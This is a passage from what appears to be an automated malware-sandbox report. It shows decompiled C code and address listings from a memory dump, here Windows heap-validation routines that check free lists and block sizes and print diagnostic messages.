											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0199E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0199A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0199A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0199BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E01A223E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01971F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                      0x01a34af7
                                      0x01a34afb
                                      0x01a34afd
                                      0x01a34b01
                                      0x01a34b03
                                      0x01a34b08
                                      0x01a34b0a
                                      0x01a34b0f
                                      0x01a34eb5
                                      0x01a34eb5
                                      0x01a34ebb
                                      0x01a350d5
                                      0x01a350d8
                                      0x01a34ff6
                                      0x00000000
                                      0x01a34ff6
                                      0x01a350de
                                      0x01a350e4
                                      0x01a350e8
                                      0x01a35107
                                      0x01a3510c
                                      0x01a350ea
                                      0x01a350ff
                                      0x01a35104
                                      0x01a35112
                                      0x01a35115
                                      0x01a35118
                                      0x01a35119
                                      0x01a350cb
                                      0x01a350cb
                                      0x01a350af
                                      0x00000000
                                      0x01a350af
                                      0x01a34ecb
                                      0x01a350b6
                                      0x01a350bb
                                      0x01a34ed1
                                      0x01a34ee6
                                      0x01a34eeb
                                      0x01a350c1
                                      0x01a350c2
                                      0x01a350c5
                                      0x01a350c6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a34b15
                                      0x01a34b15
                                      0x01a34b1c
                                      0x01a34b1e
                                      0x01a34b23
                                      0x01a34b27
                                      0x01a34b33
                                      0x01a34b38
                                      0x01a34b3a
                                      0x01a34b3c
                                      0x01a34b41
                                      0x01a34b41
                                      0x01a34b3a
                                      0x01a34b52
                                      0x01a35045
                                      0x01a3504b
                                      0x01a3504f
                                      0x01a3506e
                                      0x01a35073
                                      0x01a35051
                                      0x01a35066
                                      0x01a3506b
                                      0x01a35083
                                      0x01a35088
                                      0x01a35088
                                      0x01a3508a
                                      0x01a35091
                                      0x01a35099
                                      0x01a35099
                                      0x01a3509d
                                      0x01a350a7
                                      0x01a350ad
                                      0x01a350ad
                                      0x01a350ad
                                      0x00000000
                                      0x01a3509d
                                      0x01a34b58
                                      0x01a34b5b
                                      0x01a34b5e
                                      0x01a34b63
                                      0x01a34b66
                                      0x01a34b69
                                      0x01a34b6f
                                      0x01a34be4
                                      0x01a34bf0
                                      0x01a34bf2
                                      0x01a34bf5
                                      0x01a34dc3
                                      0x01a34dc6
                                      0x01a34dc9
                                      0x01a34dce
                                      0x01a34dce
                                      0x01a34dd0
                                      0x01a34dd0
                                      0x01a34dd5
                                      0x01a34def
                                      0x01a34dd7
                                      0x01a34de7
                                      0x01a34de7
                                      0x01a34df3
                                      0x01a35001
                                      0x01a35007
                                      0x01a3500b
                                      0x01a3502a
                                      0x01a3502f
                                      0x01a3500d
                                      0x01a35022
                                      0x01a35027
                                      0x01a35039
                                      0x01a3503a
                                      0x01a3503b
                                      0x00000000
                                      0x01a34df9
                                      0x01a34dfd
                                      0x01a34e90
                                      0x01a34e94
                                      0x01a34e9e
                                      0x01a34ea4
                                      0x01a34ea4
                                      0x01a34ea4
                                      0x01a34ea6
                                      0x01a34ea6
                                      0x00000000
                                      0x01a34ea6
                                      0x01a34e03
                                      0x01a34e08
                                      0x01a34f88
                                      0x01a34f92
                                      0x01a34f99
                                      0x01a34f9c
                                      0x01a34fe0
                                      0x01a34fe4
                                      0x01a34fee
                                      0x01a34ff4
                                      0x01a34ff4
                                      0x01a34ff4
                                      0x00000000
                                      0x01a34fe4
                                      0x01a34f9e
                                      0x01a34fa4
                                      0x01a34fa8
                                      0x01a34fc7
                                      0x01a34fcc
                                      0x01a34faa
                                      0x01a34fbf
                                      0x01a34fc4
                                      0x01a34fd2
                                      0x01a34fd5
                                      0x01a34fd6
                                      0x01a34f34
                                      0x01a34f34
                                      0x00000000
                                      0x01a34f39
                                      0x01a34e0e
                                      0x01a34e14
                                      0x01a34e1b
                                      0x01a34e25
                                      0x01a34e2b
                                      0x01a34e2b
                                      0x01a34e33
                                      0x01a34e38
                                      0x01a34e8a
                                      0x01a34e8a
                                      0x00000000
                                      0x01a34e3a
                                      0x01a34e3e
                                      0x01a34e43
                                      0x01a34e47
                                      0x01a34e53
                                      0x01a34e58
                                      0x01a34e5a
                                      0x01a34e5c
                                      0x01a34e61
                                      0x01a34e61
                                      0x01a34e5a
                                      0x01a34e6e
                                      0x01a34f41
                                      0x01a34f47
                                      0x01a34f4b
                                      0x01a34f6a
                                      0x01a34f6f
                                      0x01a34f4d
                                      0x01a34f62
                                      0x01a34f67
                                      0x01a34f7f
                                      0x01a34f80
                                      0x01a34f81
                                      0x00000000
                                      0x01a34e74
                                      0x01a34e78
                                      0x01a34e82
                                      0x01a34e88
                                      0x01a34e88
                                      0x00000000
                                      0x01a34e78
                                      0x01a34e6e
                                      0x01a34e38
                                      0x01a34df3
                                      0x01a34bfe
                                      0x01a34c01
                                      0x01a34c04
                                      0x01a34c07
                                      0x01a34c09
                                      0x01a34c0c
                                      0x01a34c0e
                                      0x01a34c0e
                                      0x01a34c11
                                      0x01a34c11
                                      0x01a34c0c
                                      0x01a34c14
                                      0x01a34c17
                                      0x01a34dae
                                      0x01a34db2
                                      0x01a34db7
                                      0x01a34dba
                                      0x01a34dbd
                                      0x01a34ef1
                                      0x01a34ef7
                                      0x01a34efb
                                      0x01a34f1a
                                      0x01a34f1f
                                      0x01a34efd
                                      0x01a34f12
                                      0x01a34f17
                                      0x01a34f2b
                                      0x01a34f2b
                                      0x01a34f2d
                                      0x01a34f2e
                                      0x01a34f2f
                                      0x00000000
                                      0x01a34f2f
                                      0x00000000
                                      0x01a34c1d
                                      0x01a34c1d
                                      0x01a34c20
                                      0x01a34c23
                                      0x01a34c26
                                      0x01a34c29
                                      0x01a34c2c
                                      0x01a34c2e
                                      0x01a34d91
                                      0x01a34d91
                                      0x01a34d92
                                      0x01a34d97
                                      0x01a34d9e
                                      0x00000000
                                      0x01a34d9e
                                      0x01a34c34
                                      0x01a34c37
                                      0x01a34c39
                                      0x01a34c3c
                                      0x00000000
                                      0x00000000
                                      0x01a34c45
                                      0x01a34c48
                                      0x01a34c4e
                                      0x01a34c50
                                      0x01a34c78
                                      0x01a34c78
                                      0x01a34c7b
                                      0x01a34c7d
                                      0x01a34c80
                                      0x01a34c84
                                      0x01a34cad
                                      0x01a34cad
                                      0x01a34cb0
                                      0x01a34cb8
                                      0x01a34cbb
                                      0x01a34cbe
                                      0x01a34cc1
                                      0x01a34cc7
                                      0x01a34cdc
                                      0x01a34cc9
                                      0x01a34cd2
                                      0x01a34cd4
                                      0x01a34cd4
                                      0x01a34cde
                                      0x01a34ce0
                                      0x01a34d13
                                      0x01a34d13
                                      0x01a34d16
                                      0x01a34d18
                                      0x01a34d29
                                      0x01a34d2a
                                      0x01a34d2c
                                      0x01a34d34
                                      0x01a34d1a
                                      0x01a34d1a
                                      0x01a34d1a
                                      0x01a34d1d
                                      0x01a34d1f
                                      0x01a34d22
                                      0x01a34d24
                                      0x01a34d24
                                      0x01a34d3c
                                      0x01a34d3f
                                      0x01a34d45
                                      0x01a34d47
                                      0x01a34d6c
                                      0x01a34d6c
                                      0x01a34d70
                                      0x01a34d7e
                                      0x01a34d84
                                      0x01a34d84
                                      0x00000000
                                      0x01a34d49
                                      0x01a34d49
                                      0x01a34d56
                                      0x01a34d56
                                      0x01a34d59
                                      0x00000000
                                      0x00000000
                                      0x01a34d4e
                                      0x01a34d50
                                      0x01a34d52
                                      0x01a34d8e
                                      0x01a34d5d
                                      0x01a34d5f
                                      0x01a34d67
                                      0x00000000
                                      0x01a34d67
                                      0x01a34d54
                                      0x01a34d54
                                      0x01a34d5b
                                      0x00000000
                                      0x01a34d5b
                                      0x01a34ce2
                                      0x01a34ce2
                                      0x01a34ce5
                                      0x01a34ce5
                                      0x01a34ce7
                                      0x01a34cfb
                                      0x01a34ce9
                                      0x01a34ce9
                                      0x01a34cec
                                      0x01a34cef
                                      0x01a34cf1
                                      0x01a34cf3
                                      0x01a34cf3
                                      0x01a34cf3
                                      0x01a34cf6
                                      0x01a34cf6
                                      0x01a34d02
                                      0x01a34d05
                                      0x00000000
                                      0x00000000
                                      0x01a34d07
                                      0x01a34d0f
                                      0x01a34d11
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a34d11
                                      0x00000000
                                      0x01a34ce5
                                      0x01a34ce0
                                      0x01a34c8a
                                      0x01a34c8f
                                      0x01a34c91
                                      0x00000000
                                      0x00000000
                                      0x01a34c9d
                                      0x00000000
                                      0x01a34c9d
                                      0x01a34c52
                                      0x01a34c5f
                                      0x01a34c5f
                                      0x01a34c62
                                      0x00000000
                                      0x00000000
                                      0x01a34c57
                                      0x01a34c59
                                      0x01a34c5b
                                      0x01a34caa
                                      0x01a34c66
                                      0x01a34c68
                                      0x01a34c70
                                      0x01a34c75
                                      0x00000000
                                      0x01a34c75
                                      0x01a34c5d
                                      0x01a34c5d
                                      0x01a34c64
                                      0x00000000
                                      0x01a34c64
                                      0x01a34c17
                                      0x01a34b75
                                      0x01a34bc4
                                      0x01a34bc8
                                      0x00000000
                                      0x00000000
                                      0x01a34bd9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a34b77
                                      0x01a34b7a
                                      0x01a34b8c
                                      0x01a34b7c
                                      0x01a34b7e
                                      0x01a34b83
                                      0x01a34b86
                                      0x01a34b86
                                      0x01a34b90
                                      0x01a34b93
                                      0x00000000
                                      0x00000000
                                      0x01a34b95
                                      0x01a34bab
                                      0x01a34bb0
                                      0x00000000
                                      0x00000000
                                      0x01a34bb2
                                      0x01a34bb9
                                      0x00000000
                                      0x00000000
                                      0x01a34bbb
                                      0x01a34bbe
                                      0x01a34bc1
                                      0x01a34bc1
                                      0x00000000
                                      0x01a34bc1
                                      0x01a34b97
                                      0x01a34ba4
                                      0x00000000
                                      0x00000000
                                      0x01a34ba6
                                      0x00000000
                                      0x01a34ba6
                                      0x01a34ea9
                                      0x01a34ea9
                                      0x01a34eb2
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                      • API String ID: 0-3591852110
                                      • Opcode ID: b84a87bc3127e9169e34954de14f6cbe4110d4e9a8e99befbeb3653e0a6b13cc
                                      • Instruction ID: 00452f87c4f1cdd307f747d05e01640203a996714f69f1e5312b3e2453fdeed8
                                      • Opcode Fuzzy Hash: b84a87bc3127e9169e34954de14f6cbe4110d4e9a8e99befbeb3653e0a6b13cc
                                      • Instruction Fuzzy Hash: 1F12D1706046429FDB25CF6DC495BBABBF5FF89714F188459F48A8B641D734E880CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A34496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 56%
                                      			E01A34496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E01A349A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1a66378 = _t267;
						asm("int3");
						 *0x1a66378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E019A174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0197B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0197B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1a66350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E019B9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E019A174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0197B150();
										} else {
											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0197B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0197B150();
									} else {
										E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0197B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0197B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01A34AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E01A2FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E01A223E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                      0x01a344a1
                                      0x01a344a3
                                      0x01a344a7
                                      0x01a344ac
                                      0x01a344af
                                      0x01a344b2
                                      0x01a344b9
                                      0x01a344bc
                                      0x01a347f2
                                      0x01a347f2
                                      0x01a347f8
                                      0x01a347fc
                                      0x01a347fe
                                      0x01a34804
                                      0x01a34805
                                      0x01a34805
                                      0x01a3480c
                                      0x01a34810
                                      0x01a34812
                                      0x01a34812
                                      0x01a34812
                                      0x01a34822
                                      0x01a34822
                                      0x01a34827
                                      0x01a34827
                                      0x00000000
                                      0x01a34827
                                      0x01a344c4
                                      0x01a344d3
                                      0x01a344d9
                                      0x01a344dc
                                      0x01a344de
                                      0x01a344e0
                                      0x01a34560
                                      0x01a34520
                                      0x01a34522
                                      0x01a34525
                                      0x01a34528
                                      0x01a3452b
                                      0x01a3452e
                                      0x01a34530
                                      0x01a34697
                                      0x01a3469d
                                      0x01a346a1
                                      0x01a346c0
                                      0x01a346c5
                                      0x01a346a3
                                      0x01a346b8
                                      0x01a346bd
                                      0x01a346cb
                                      0x01a346d4
                                      0x01a34677
                                      0x01a34677
                                      0x01a34679
                                      0x01a3467c
                                      0x01a3468a
                                      0x01a34690
                                      0x01a34690
                                      0x01a347f1
                                      0x01a347f1
                                      0x01a347f1
                                      0x00000000
                                      0x01a347f1
                                      0x01a34536
                                      0x01a34539
                                      0x01a3453c
                                      0x01a34636
                                      0x01a3463c
                                      0x01a34640
                                      0x01a3465f
                                      0x01a34664
                                      0x01a34642
                                      0x01a34657
                                      0x01a3465c
                                      0x01a34670
                                      0x00000000
                                      0x01a34542
                                      0x01a34542
                                      0x01a34546
                                      0x01a34548
                                      0x01a3454b
                                      0x01a34555
                                      0x01a3455b
                                      0x01a3455b
                                      0x01a3455b
                                      0x01a3455d
                                      0x01a3455d
                                      0x01a3455d
                                      0x00000000
                                      0x01a3455d
                                      0x01a3453c
                                      0x01a34579
                                      0x01a3457c
                                      0x01a34587
                                      0x01a34589
                                      0x01a34591
                                      0x01a34592
                                      0x01a34597
                                      0x01a34598
                                      0x01a345a1
                                      0x01a345ab
                                      0x01a345ab
                                      0x01a345a1
                                      0x01a345ae
                                      0x01a345b4
                                      0x01a345b9
                                      0x01a345bd
                                      0x01a34759
                                      0x01a34759
                                      0x01a3475f
                                      0x01a34761
                                      0x01a34763
                                      0x01a34765
                                      0x01a34768
                                      0x01a3476b
                                      0x01a3476d
                                      0x01a3479c
                                      0x01a3479c
                                      0x01a3479f
                                      0x01a347a2
                                      0x01a347a4
                                      0x01a34830
                                      0x01a34833
                                      0x01a34879
                                      0x01a3487d
                                      0x01a348f1
                                      0x01a348f3
                                      0x01a348f3
                                      0x00000000
                                      0x01a348f3
                                      0x01a3487f
                                      0x01a34885
                                      0x01a34887
                                      0x01a348a8
                                      0x01a348a8
                                      0x01a348ae
                                      0x01a348b0
                                      0x01a348dc
                                      0x01a348dc
                                      0x01a348dc
                                      0x01a348dc
                                      0x01a348ec
                                      0x00000000
                                      0x01a348ec
                                      0x01a348b2
                                      0x01a348bc
                                      0x01a348be
                                      0x01a348c1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a348c3
                                      0x01a348c3
                                      0x01a348c6
                                      0x01a348c9
                                      0x01a348cc
                                      0x01a348d1
                                      0x01a348d4
                                      0x00000000
                                      0x00000000
                                      0x01a348d6
                                      0x01a348d7
                                      0x01a348da
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a348da
                                      0x01a3494f
                                      0x01a34955
                                      0x01a34959
                                      0x01a34978
                                      0x01a3497d
                                      0x01a3495b
                                      0x01a34970
                                      0x01a34975
                                      0x01a34986
                                      0x01a34987
                                      0x01a3498a
                                      0x01a3498d
                                      0x01a34997
                                      0x01a347ef
                                      0x01a347ef
                                      0x01a347ef
                                      0x00000000
                                      0x01a347ef
                                      0x01a34890
                                      0x01a34890
                                      0x01a34891
                                      0x01a34891
                                      0x01a34894
                                      0x01a34897
                                      0x01a3489d
                                      0x01a348a0
                                      0x00000000
                                      0x00000000
                                      0x01a348a2
                                      0x01a348a3
                                      0x01a348a6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a348a6
                                      0x01a348fb
                                      0x01a34901
                                      0x01a34905
                                      0x01a34924
                                      0x01a34929
                                      0x01a34907
                                      0x01a3491c
                                      0x01a34921
                                      0x01a3492f
                                      0x01a34935
                                      0x01a34936
                                      0x01a34939
                                      0x01a34942
                                      0x00000000
                                      0x01a34947
                                      0x01a34835
                                      0x01a3483b
                                      0x01a3483f
                                      0x01a3485e
                                      0x01a34863
                                      0x01a34841
                                      0x01a34856
                                      0x01a3485b
                                      0x01a34869
                                      0x01a3486c
